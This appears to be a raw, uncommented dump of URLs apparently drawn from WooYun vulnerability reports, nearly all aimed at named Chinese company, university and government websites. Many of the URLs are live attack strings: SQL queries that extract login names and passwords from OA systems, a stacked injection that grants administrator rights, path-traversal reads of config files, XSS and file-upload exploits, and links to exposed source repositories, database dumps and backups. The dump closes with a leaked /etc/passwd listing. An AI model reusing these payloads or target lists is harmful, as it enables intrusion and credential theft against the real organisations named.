http://mail.yili.com/user/?q=login http://www.career.ecnu.edu.cn/adm_StuInfoMG/Print_jybdzsqb.aspx?xsxh=51110801003 http://www.career.ecnu.edu.cn/adm_StuInfoMG/Print_jybdzsqb.aspx?xsxh=51110801004 http://www.jxnxs.com/eportal/ui?moduleId=1&pageId=436085&struts.portlet.action=/portlet/uploadFile.action&isCkEditor=true http://airchina.health.ikang.om/为国航定制,选择普通会员找回密码 http://photo.sinosig.com/ http://photo.sinosig.com/images/class.asp http://218.94.57.147:9001/gen/SysLogin.aspx http://218.94.57.147:8997/gen/Login.aspx http://www.jsds.gov.cn/download/ http://**.**.**.**/bugs/wooyun-2015-0113942 http://**.**.**.**/bugs/wooyun-2015-0113942 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://www.wfrcsc.com/web/qyShow.jsp?id=32939 
http://subsite.nenu.edu.cn/professor/pro/yul/c_jbxx_new.php?id=1304 http://111.205.50.219/ http://111.205.50.219/spring/flww/flowUser/isRight http://sqlmap.org http://117.25.194.120/ http://117.25.194.121/ http://117.25.194.122/ http://117.25.194.123/ http://117.25.194.124/ http://117.25.194.125/ http://www.yichengpin.com http://a.cheshi.com/user/0300/order/order_price.php?action=info&orderid=5467900 http://a.cheshi.com/user/0300/order/order_steer.php?action=info&orderid=5467926 http://a.cheshi.com/user/0300/order/order_exchange.php?action=info&orderid=5467926 http://a.cheshi.com/user/0300/order/order_repair.php?action=info&orderid=1 http://a.cheshi.com/user/0300/order/order_second.php?action=info&orderid=12650 http://crm.maidouyisheng.com/.svn/entries http://suifang.net/.svn/entries http://www.maidouyisheng.com/.svn/entries http://www.ziroom.com/ziroomer/activity/?category_id=11 http://wooyun.org/bugs/wooyun-2015-0124425 http://www.ztbest.com/index.php?mod=user&act=login http://xg.hbwj.com.cn/page/TAB_ArchivesPrint/XGStudyLogPrint.aspx?stuId=144978&sess=1146&stage=2 http://xg.hbwj.com.cn/page/TAB_ArchivesPrint/XGStudyLogPrint.aspx?stuId=144979&sess=1146&stage=2 http://yc.hbwj.com.cn/page/welcomepage/quickdetail_form.aspx?stuid=118607 http://yc.hbwj.com.cn/page/welcomepage/QuickDetail_Form.aspx?stuID=195387 http://124.173.121.130 http://124.173.121.130/admin http://124.173.121.130/admin/sql.php URL:http://1icounter.sinosig.com/invoker/JMXInvokerServlet http://1icounter.sinosig.com/lmes/index.jsp http://lib.scmu.edu.cn/robots.txt http://lib.scmu.edu.cn/temp/data/deepthroat_20140607_995701_1.sql http://202.104.124.60 http://www.gogo.cn/Admin/ http://222.222.62.58:8008/Default.aspx http://218.6.203.34/setsys_backup.htm导出配置文件。 http://www.weaver.com.cn/ http://pm.weaver.cn:9085/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER 
http://oa.cowealth.com:8080/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://snkbj.bluefocusgroup.com/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://oa.acgmc.com/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER http://oa.smvic.com.cn/ServiceAction/com.eweaver.base.DataAction?sql=select%20LOGONPASS%20from%20SYSUSER%20where%20LONGONNAME%20=%20%27sysadmin%27 http://218.28.18.5/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER https://github.com/JanvenZhao/Trunk-NoCommit http://mobile-api2011.elong.com http://www.astour.gov.cn/newsPage.php?nsId=2389 http://www.cjhdj.com.cn/CjhdjManage http://www.acicmall.com/ http://www.acicmall.com/uum/member/resetPassword/MzIwMzM= http://www.acicmall.com/uum/member/resetPassword/MzIwMzQ= www.acicmall.com http://www.acicmall.com http://bbs.tianya.cn/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml http://wenda.tianya.cn/search.jsp http://passport.tianya.cn/countryTel/json.do?var=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://open.tianya.cn/static/js/my_popbox_js.js/a.php http://ebook.tianya.cn/ http://apps.tianya.cn/static/upgrade2/css/style.css/a.php http://fc.tcl.com/admin/tcl03.aspx www.hanzify.org http://dangqun.sjzpt.edu.cn/index.php?c=index&a=lists&catid=1&parentid=0 http://keyan.sjzpt.edu.cn/news/index.php?itemid=1 http://keyan.sjzpt.edu.cn/news/content.php?newsid=433 http://part.sjzpt.edu.cn/keyan/news/list.php?itemid=44 http://zzb.sjzpt.edu.cn//index.php?c=index&a=show&newsid=191 http://sd.99.com/ http://m.open.com.cn/search/results/1?keywords=-1 http://www.yileyoo.com/programme_detail/101 http://saas.sundns.com/yoveleDynamic_details.html?ID=206 http://sunuc.sundns.com/Details_dow_page.html?ID=79 www.e-cology.com.cn http://www.e-cology.com.cn/messager/users.data www.zhaokao.net http://221.179.131.155/ 
http://www.zteclouds.cn http://122.115.57.230/portal/user/forget.htl index.php/channel/search/l/cn www.hslcs.org.cn www.lubaocar.com http://www.lubaocar.com/web.rar http://www.erun360.com/infocenter/Search.aspx?word=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://221.230.140.53:81/TaiZhou/systemsetting/userLogin.action http://suzhou.dcits.com/ http://suzhou.dcits.com/guoxin/cn/products.php?tid=3 https://github.com/chengxiaowei/-demo-/blob/fb215c0765828697a887b680cbf30d27e1a05fa2/%E6%8B%9B%E8%81%98.txt http://www.dtdrc.gov.cn/ldjhnr1.asp?action=list&newsclass=4&id=70 http://www.dtdrc.gov.cn/Login.asp?act=add http://www.dtdrc.gov.cn/root.asp http://credit.open.com.cn/Home/Login http://credit.open.com.cn:80/Home/Login http://oa.daojia.com/ http://www.to8to.com/yezhu/list.php?&btype=2&stype=1&s=2 http://www.to8to.com/yezhu/list.php?&btype=2&stype=1 http://www.to8to.com/yezhu/list.php?&btype=2&stype=1 http://bbs.g.baofeng.com/ inurl:http://huodong.fanli.com/xunlei?xluserid= http://huodong.fanli.com/xunlei?xluserid=138800632&xlaccount=311456982&cachetime=0.9165479822770544 http://huodong.fanli.com/xunlei?xluserid=428510&xlaccount=minemings&ischild=0&cachetime=0.5528254928067327 http://huodong.fanli.com/xunlei?xluserid=135044542&xlaccount=267905322&ischild=0&cachetime=0.5916803723666817 http://www.xianda365.com/ http://fzb.dlzs.gov.cn/xzcf_detail.php?id=90 http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-0102464 http://rd.haierpeople.cn http://crm.taxchina.com/wcm/inside/HoldsRate/Public/LookFee/List.aspx?Ids=10977794 http://approval.cqnc.gov.cn/Approval/ApprovalList.aspx?SearchStr=%E5%8C%BA%E5%AE%89%E7%9B%91%E5%B1%80 http://cqnc.gov.cn/super/login.asp http://approval.cqnc.gov.cn/Approval/ApprovalList.aspx?SearchStr=%E5%8C%BA%E5%AE%89%E7%9B%91%E5%B1%80 http://mail.cnr.cn/webmail/.svn/entries http://www.x-rosen.com/pro.php?id=90 http://am.hit.edu.cn/zpy/mdscorelogin.php http://am.hit.edu.cn/zpy/mdscorecheck.php http://58.215.56.61/OA/Login.aspx 
http://58.215.56.61/OA/ExcelExport/%E4%BA%BA%E5%91%98%E5%88%97%E8%A1%A8.xls http://61.183.36.24/oa8/ http://61.132.114.180:8080/mail/login.aspx?loginid=%B0%AE%B5%C4&password=ad+&tj=%B5%C7+%C2%BD http://www.haxx.lss.gov.cn/ggxx/perinfo.php该界面可以查询社保,试着在password处输入-1 http://www.haxx.lss.gov.cn:80/ www.haxx.lss.gov.cn http://baidurank.aizhan.com/baidu/apesk.com/position/ http://www.apesk.com/Management-potential/glqz_report_admin.asp?id=26 http://www.deyang.gov.cn/manager/login.jsp http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77 http://www1.deyang.gov.cn/fgw-new/LawDetailPage.aspx?ID=77 http://archi.hit.edu.cn/quit!LogOut.do http://dev.gionee.com/developer/login.jsp http://www.jys.gov.cn/public/js/count.php?i=262648 http://demo.magicwinmail.com:6080/ http://mail.cqksy.cn/ http://afis.hit.edu.cn/system/log.jsp http://218.76.35.13:8801/LWP http://www.chinagreentown.com/hr/comm_member_resume.php http://www.chinagreentown.com/upload/resume/f379f2cd024938d6743bd5e470836a57.php http://admin.houtai.163disk.com/index.php http://cabin.airchina.com.cn/cwzb/default.jsp http://cabin.airchina.com.cn/cwzb/changepwdAction.do?user=admin*&password=asdasd&newpwd1=asdasd111&newpwd2=asdasd111 http://www.961890.gov.cn/content/NewsPaperInfo.aspx?PolicyWorkSn=1312 http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml 
http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml 
http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/ http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://**.**.**.**/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://www.lorealparis.com.cn/Member/NewLogin.loreal?link=1 http://workflow.cyou-inc.com:89/login.do https://mail.cyou-inc.com/ http://221.179.131.155/ http://www.tlstar.com.cn/Account/UserList.aspx http://www.160job.com/main/kongsijianjie.asp?idCompany= http://tj.fruitday.com/login.php,登陆页面存在csrf,可以构造post请求,重置管理员密码 http://bbs.pinyin.sogou.com http://bbs.pinyin.sogou.com/uc_server/data/tmp/upload25.jpg/1.php http://oa.emar.com/showphoto.xf?photoid=1 http://oa.ciming.com/)存在任意文件上传漏洞 http://oa.ciming.com/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://oa.ciming.com/defaultroot/upload/information/+文件名 http://mrtg.cc.sandai.net/auth/login/ http://123.162.191.90/auth/login/ http://115.239.134.136/ http://115.239.134.136/Login/login.do http://www.xiangguo.com/login http://union.chinadrtv.com/login site:xyfm.niu.xunlei.com http://dp.gdppla.edu.cn/jybnew/ewebeditor/admin_login.asp?action=login dp.gdppla.edu.cn/jybnew/eWebEditor/db/ewebeditor.mdb http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 http://zyyd.media.open.com.cn/picexam/picexam.asp?course_id=0001 www.chevip.com https://www.hontai.com.tw/09pages/cont/qaservice.aspx?Aid=QAS74&Qid=R&Uid=qa0001 
http://www.hspcn.net/home/ProductPro/?PRODUCT_TYPE=*&MORE10_FLAG=&AREA_ID=&pagesize=20&sidx=&sord=&PRODUCT_PIC_FLAG=false&REALNAME_FLAG=false&SEARCH_KEYWORD=a http://www.hspcn.net/home/ProductPro/?PRODUCT_TYPE=&sidx= http://www.tianlian.com http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID= http://www.lrts.me/updateBasicInfo.do?areaIds=地区&birthday=生日&email=邮箱&nickName=昵称&remark=个性签名&sex=性别 http://t.im/qcfo"/ http://www.lrts.me/updateBasicInfo.do?areaIds=29_456&birthday=1970-1-1&email=test@test.com&nickName=xk%3Cimg%20src=%22http://t.im/qcfo%22/%3E&remark=test&sex=1 http://www.lrts.me/addComment.do?commentContent=test&entityId=9758&entityType=2 http://www.lrts.me/user/addFollow.do?userId=123141749 http://www.lrts.me/user/cancellFollow.do?userId=123141749 http://www.lrts.me/user/addCollection.do?entityId=9758&entityType=2 http://www.lrts.me/user/delCollection.do?entityId=9758&entityType=2 http://www.lrts.me/user/addLike.do?entityId=9758&entityType=2 http://www.hhfdcw.com/html/news/201506/task-373.html index.php/article/search http://www.hhfdcw.com/index.php/article http://wei.tixaapp.com/index.php?g=Admin&m=Admin&a=index http://27.115.51.166/script http://jinrilicai.cn/newsshow.asp?id=1680 http://3g.sunlands.com/ http://3g.sunlands.com/cas/showForgetPage.action http://61.168.11.25:7080/Monopoly/monopoly/index.html?chl=14 http://tieba.baidu.com/p/3794006612 http://ku.cetools.cn/designer.asp?did=@@version https://cloud.zzidc.com/ch_config ftp://www.sxly.com.cn/ http://open.haodai.com/list/index.html?city=beijing&dkje=5&dklx=%e8%af%b7%e9%80%89%e6%8b%a9&dkqx=12 http://www.lrts.me/update/integral.do display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 display:none!important;display:block;width=0;height=0 http://www.huanrong2010.com/扫描后发现开放了好多端口,一个一个看,在82端口发现了一个好玩的东西 
http://www.to8to.com/my/order_info.php?order_no=678440000054 http://www.wanda-cti.com/index.php?m=content&c=index&a=lists&catid=127 http://60.10.8.227:88//wui/common/page/sysRemind.jsp?labelid=2&browserOS=a430d%3Cimg%20src%3da%20onerror%3dconfirm%2811111%29%3Edaa74 http://**.**.**/www/index.php_ http://**.**.**/www/index.php_ http://**.**.**/www/index.php_ www.mdaxue.com http://about.richinfo.cn/ http://121.15.167.239:9000/invoker/EJBInvokerServlet http://121.15.167.239:9000/pm/LoginAction.do http://121.15.167.239:9000/jmx-console/ http://www.hbfgw.gov.cn:84/gw/admin/index.html http://hangjia.com/policy/policydetail/96189385619644526.html http://oa.ldjt.com.cn/login/Login.jsp?logintype=1 http://oa.ldjt.com.cn/tools/SWFUpload/upload.jsp http://oa.ldjt.com.cn/weaver/weaver.email.FileDownloadLocation?fileid=221&download=1 http://shop.pcjoy.cn/gamedetails.aspx?lid=10007&tid=1&sid=136 http://wooyun.org/bugs/wooyun-2010-0108853 http://wooyun.org/bugs/wooyun-2010-0114237 http://ci.kaikeba.com/ http://*.*.*.*/XXXXXX http://api.bilibili.com/search_recommend?_device=android&_hwid=3029927d46659793&_ulv=5000&access_key=76b5b9bdfe34bb8e2a809ba718ac5c6e&appkey=c1b107428d337928&main_ver=v2&platform=android&playtag=2634430&recommend_type=related_post&rindex=1&sign=8ec7f03f380c8a0e289698cb4e75985f http://sqlmap.org http://m.qu.cn/login.php http://baozouribao.com/admin/ http://user.chinaiiss.com/index.php?do=space&uid=999692 http://pinyin.sogou.com/zt/acgn/pc/ajax_post.php http://www.caohua.com/zoning/zo_ga_list?ga_id=1 http://portal.hnust.edu.cn http://t.jzt.58.com/thirdparty/v20/order/orderlist?comm_pf=&refer=1 http://psms.emersonnetwork.com.cn:8000/jsp/admin/login.jsp http://www.qhgrain.gov.cn/admin/webedit/admin_login.asp http://**.**.**.**/Frm/StatPoint.aspx http://**.**.**.**:8085/admin/systems/SetDataWindowStyle.aspx?dwname=1 http://**.**.**.**/admin/systems/SetDataWindowStyle.aspx?dwname=1 http://**.**.**.**/admin/systems/SetDataWindowStyle.aspx?dwname=1 
http://fi.amac.org.cn/csrcforsale/user!getZhuanHuList.action http://silang.cn:8000/Login.asp http://www.gxjdgyxx.com:8000/App_Public/Login.aspx?ReturnUrl=%2fDefault.aspx http://www.gxjdgyxx.com:9000/FileUpload/WorkFlow/test/20158/aspx_3.aspx http://ume1.umetrip.com/UmeAd/user/suggest.do?rcid=57208487 http://www.broadtech.hk/eagleshop/shop/ShopTop.aspx http://221.176.66.92:8030/wlan/loginAction!login.action http://221.176.66.92:8030/jsp/top.jsp http://bbs.rh.xunlei.com/ http://bus.jmmr.com/index.asp http://wooyun.org/bugs/wooyun-2010-04477 http://www.brtxm.com:8888/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27qwezxcasd%27%27%27%29-- http://shandongbi.wancaitong.com/ http://218.202.0.172/ynscm/login.html http://www4.pconline.com.cn/extmail/cgi/index.cgi?__mode=show_login&error=badlogin http://www.ys7.com/member-receiver.html http://play6.pconline.com.cn/oc/login.jsp http://bbs.pconline.cn/admin/ http://bbs.pconline.cn/admin/forum.jsp https://www.bbpay.com/cgi-bin/flop https://www.bbpay.com/cgi-bin/flopway?mold=0 https://www.bbpay.com/cgi-bin/flop-semail www.i9huan.com www.i9huan.com http://sqlmap.org http://jq.shanghai12301.com/lyj/ http://www.scxj.org/search.php?keyword=1 http://oa.meizu.com/seeyon/index.jsp http://oa.meizu.com//seeyon/logs/ctp.log http://oa.meizu.com//seeyon/logs/uc.log http://xhd.iyiyun.com/xhd.tar.gz http://oa.pc.com.cn/login.do?st=-1 http://epaper.subaonet.com/ http://www.cl.yn.gov.cn/show.aspx?cid=46&id=5471 http://www.gdfc.org.cn/jk_ph_dj.jsp?subject_id=200 http://12333.ttrc.gov.cn:8088/cjwt/wsfw_cjwt_detail.jsp?id= http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jspsite=/home&siteID=8a8080820b78cd84010b79331b92001e&ID=661401 
http://www.hbcz.gov.cn:8080/arkcms/lanmu/artlist.jspLM_ID=402880810c843f9c010c84e611fa0004&LM_ML=/home/lm0/lm00 http://www.hbcz.gov.cn:7001/XZQHQueryWAR/xxcx/zzjb-js_new.jsp?type=a&code=420000 http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?site=/home&siteID=8a8080820b78cd84010b79331b92001e&ID=661401 http://service.taxchina.com/wcm/outsite/answer/site/ShowList.aspxtypeId=&voId=&partner=0&isChief=&isAnswer=0&condition=no&search= http://user.taxchina.com/wcm/outsite/answer/site/ShowList.aspx?typeId=&voId=&partner=&isChief=&isAnswer=&condition=&search= htts://www.v2ex.com/reset/ http://yuanchuang.10jqka.com.cn/20150731/c579165938.shtml http://user.91160.com/account/sendBindEmail.html https://122.156.42.163/function/ssh/file_ssh.php https://122.156.42.163/function/ssh/file_ssh_exec.php?action=user_query&id=2 http://vcc.siat.ac.cn/index/info?title_id=455 http://vcc.siat.ac.cn/index/getInfo?title_id=455 http://vcc.siat.ac.cn/index/info?lan=true&to_path=research&title_id=453 http://vcc.siat.ac.cn/index/info?to_path=research&title_id=453 http://vcc.siat.ac.cn/index/videoList?title_id=453 http://vcc.siat.ac.cn/index/album?title_id=451 http://vcc.siat.ac.cn/index/member?title_id=452&sub_title=460 http://vcc.siat.ac.cn/index/photo?title_id=451&sub_title=459&album_id=102 http://vcc.siat.ac.cn/index/info?title_id=457 http://nmcqjy.com/nmcqjy.rar http://211.155.87.208/redmine/ inurl:/opac/search.php,影响范围很大 http://120.195.143.181:9090/opac/book_rank.php?cls_no=Q http://lib.math.ac.cn:8080/opac/book_rank.php?cls_no=S http://210.38.120.140:8080/opac/book_rank.php?cls_no=S http://opac.qdgw.edu.cn/opac/book_rank.php?cls_no=S http://ftp.lib.bit.edu.cn/opac/book_rank.php?cls_no=S http://ico.bit.edu.cn/opac/book_rank.php?cls_no=Q http://211.68.0.11/opac/book_rank.php?cls_no=Q http://222.206.220.81/opac/book_rank.php?cls_no=Q www.joycp.net)以服务中国彩票行业为己任,致力于为我国数亿彩票用户群体提供丰富多彩、种类全面、安全可靠的电话及手机购彩服务。 http://www.joycp.com/Interface/CMS/GetCmsNanGe.ashx?lNa 
http://gzzp.gzzypx.net/guestbook/post.php?edit=true&p_id=48203 http://gzzp.gzzypx.net/Index/hotline?uin=2270963967&name=%E7%BB%BC%E5%90%88%E4%B8%9A%E5%8A%A1 http://gzzp.gzzypx.net/Index/artview?id=16485 http://95555.cmbchina.com http://app.cmbchina.com http://bank4bank.cmbchina.com http://zy.imau.edu.cn/xcbm/rsc/admin/login.asp http://zy.imau.edu.cn/xcbm/xsc/admin/index.asp http://www.zfxindai.cn/.svn/entries http://www.zfxindai.cn/sql/zfnew_copy-2015-4-1.sql http://www.zfxindai.cn/sql/zfnew_data.sql http://amc.sina.com.cn/WEB-INF/classes/application.properties http://amc.sina.com.cn/WEB-INF/classes/applicationContext.xml http://amc.sina.com.cn/WEB-INF/web.xml http://www.chinaunicom.com.cn/city/fujian/tscp/file23.html处,福建分区特色产品中看到url:WWW.10109123.COM/life http://www.10109123.com/index.php/main/forgetpwd http://www.10109123.com/index.php/main/forgetpwd http://www.yunyiba.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.weizhonggou.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.yyyg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.xia1027.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.1yhlg.com/system/plugin/bom/bom.plugin.php?dir=../../..//system/modules http://www.1ybye.com/system/plugin/bom/bom.plugin.php?dir=../..//../ http://www.ykuaimai.com/system/plugin/bom/bom.plugin.php?dir=../..//.../ http://qccc.china.com.cn/InfoList2/DetailInfo?id=1825 http://qccc.china.com.cn/InfoList2/DetailInfo?id=1825 http://www.gogo.cn/share/13620 http://webappadmin.byd.com.cn/byd/appinfo/android.do www.yunzao.cn,yunzao,yunzao.cn,root,test http://ddpas.dandong.gov.cn/admin/login.jsp http://www.xin.com/ http://ci.culiu.org:8088/ http://112.124.16.207:8888/ http://www.wsfgj.gov.cn/ws_web/newlist.aspx?typeid=03 http://www.wsfgj.gov.cn/ws_web/newshow.aspx?id=390&typeid=13 http://mail.sinopharm.com/ VPN:https://vpn.sinopharm.com http://219.148.178.42/web/device/login?lang=1 
https://fj.9you.com/login.php http://scm.sgcs.com.cn/manager/loginAjax/loginJson_login.action http://114.247.129.12/ulp/ graphic:false http://www.nmgfic.com/web.rar http://221.226.149.17:8080/kingdee/custom/add_view_case.jsp?type=1&flag=1 http://221.226.149.17:8080/kingdee/custom/del_view_case.jsp?table_id=1 http://221.226.149.17:8080/kingdee/custom/table_view_case_modify.jsp?dbid=1&selid=1 http://221.226.149.17:8080/kingdee/custom/view_display.jsp?table_id=1&search_case=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://www.eoffcn.com/bkzt/tszz/sqlogin.php http://kdued.kingdee.com/phpmyadmin/index.php http://www.tucao.cc/index.php?m=search&c=index&a=init2&catid=24&time=all&order=inputtime&username=&tag=&q=十万个冷笑话&page=0 http://www.cqjkq.gov.cn/list3.php?maxcid=4&cid=59 https://trade.zjfae.com/zhmm/step1.htm http://222.243.162.35/Article/DetailsView.aspx?id=85 http://222.243.162.35/Article/DetailsView.aspx?id=83 http://www.ejiayu.com/web_adm/ http://shop.ejiayu.com/bak/ http://goto.hupu.com/?a=goclick&id=10511 http://babyrecord.mama.cn/index.php?action=AdminLogin http://bhvpn.buaa.edu.cn/ http://**.**.**.**:9080/zdwz/wms/jsp/user_list.jsp http://**.**.**.**:9080/zdwz/wms/login.jsp http://sinoprobe.cags.ac.cn/VideoDetail.aspx?v_id=74 http://sinoprobe.cags.ac.cn/art_show.aspx?id=42 
http://sinoprobe.cags.ac.cn/ScienceAri2.aspx?Eathid=1 http://sinoprobe.cags.ac.cn/admin/ManageLogin.aspx http://edu.cags.ac.cn/category.php?cid=60 http://edu.cags.ac.cn/content.php?aid=658 http://edu.cags.ac.cn/teachercontent.php?iid=487 http://sinoprobe.cags.ac.cn/sinoprobe.rar http://www.colasoft.com.cn/products/phras.php http://www.gogo.cn/m http://www.gogo.cn/home/feed/25937 http://doc.culiu.org http://ea.101.com/ http://report.ztgame.com/web.zip http://report.ztgame.com/.svn/entries https://report.ztgame.com/server/index.php https://report.ztgame.com/server/index.php http://www.quanjing.com/forgetpwd/step1.aspx www.chcei.org/list_news.php?news_id=1409 http://news.sogou.com http://www.leshan.gov.cn/admin/Default.aspx http://m.14271047094704.gw.1688.com/companyinfo.htm?spm=0.0.0.0.M0raBs http://wooyun.org/bugs/wooyun-2010-0113256 http://211.151.3.11/lms/index.php?s=Index/Index/login http://jf.ztgame.com:80/ http://www.xw.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.xw.gov.cn/api.php?op=phpsso&code=46bbVFNRAQIAAwkGVVADClIAWQABUgFUB1BZB1JSU00NX1dZEBhfXl9UUFhDRl5cWBNBA1dQERAACF1XQhMBGQJCVglLElReVVBNFgZcQlYRHEtLFVdWDQYFTBweQFVVAVNNREsSVF5VUE0WTWBydCB3NUJdXUoX index.php/Not/index.html?condition=&name=asdfdf http://118.194.236.11:8084/user.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
